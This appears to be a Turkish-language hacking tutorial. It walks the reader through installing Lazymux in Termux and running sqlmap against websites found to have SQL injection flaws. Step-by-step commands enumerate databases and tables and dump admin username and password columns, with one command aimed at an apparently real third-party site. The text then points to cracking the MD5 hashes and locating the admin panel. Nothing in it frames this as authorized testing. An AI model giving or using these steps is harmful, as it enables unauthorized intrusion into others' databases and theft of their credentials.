Lazymux

Kodları tek tek yazıp açıklamalarını yapıcam

apt update
pkg install git
pkg install python
pkg install python2
Paketi kurmak istediğinizde izin isteyecektir [Y/N] diye. Y yazıp enter basın.
Şimdi sıra programları kurmakta.
git clone https://github.com/Gameye98/Lazymux.git
Tekrar paket kurulumu istediğinide Y yazıp enter basın.
cd
ls
cd Lazymux
ls
python2 lazymux.py Bu komut çalışmazsa python2 yerine python yazın.
Size bir liste gelicek "Web Hacking" hangi sayıdaysa onu yazın 01 veya 05 gelir.
hangisi geldiyse o sayıyı yazıp enter basın
Karşımıza tekrardan bir liste gelicek bunlar programlar bize lazım olan program sqlmap. Yüksek ihtimal ilk sırada gelir
01 yazın enter basın [sqlmap hangi sayıdaysa onu yazın]
Tekrar [Y/N] sorabilir. Y yazıp enter basın.
Yüklendikten sonra
[99] back to menu
[00] exit lazymux
diye 2 adet yazı çıkıcak. 00 yazıp enter basın.
Çıktıktan sonra
cd
ls
cd sqlmap
ls
Bir kaç dosya gözükücek bize lazım olan dosya sqlmap.py
Çalıştırmadan önce yapacağınız işlem şöyle
Sql açığı tespit ettiğimiz sitenin databasesine giricez.

Bunun için komut satırına
python2 sqlmap.py -u http://www.hedefsite.com/index.php?id= --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

hedef sitenin sql açığı bulduğunuz bölümün url sini giriniz örnek ;

http://www.site.com/index.php?id=41

Yukarıdaki komutu girip entera bastığınız anda sql açıklı websitesini tarayıp databasesine girecektir. Bu tarama biraz uzun sürebilir.

Tarama bittikten sonra databaseler ekrana gelicektir.
[+]information_schema
[+]w3bdb

Databaseden tabloları çekmek için komut satırına
python2 sqlmap.py -u http://www.hedefsite.com/index.php?id=41 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 databaseismi --tables

Yukarıdaki komutu yazdıktan sonra size databasede bulunan tabloları listeleyecektir. Bu liste çok uzun olabilir ve admin bilgilerini bulmanızı zorlaştırabilir.

Örnek
information_schema da bulunan tablolar
-------------------------------
TABLE_NAMES
USER_PRİVİLEGES
vsvs
---------------------------

Diyelimki admin user pass olan tabloyu buldunuz
Tablodaki verileri çekmek için ise komut satırına ;

python2 sqlmap.py -u "http://cordoganclark.com/newsitem.php?id=8" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D databaseismi -T tabloismi -C username,password --dump

Bu komutu yazıyorsunuz. Sizde veri isimleri değişik olabilir ben örnek olarak yazdım.
Ekrana şöyle bir çıktı geldi varsayalım ;

-------------------------------------
username . a2dbnsjeia245
password. 243ma2134666
------------------------------------
Böyle bir sonuç çıkarsa hash killer ile md5 şifrelenmis bilgileri bulabilirsiniz. Admin paneli bulmak için yüklediğimiz lazymux programinda mevcut programlar var onlari kullanabilirsiniz.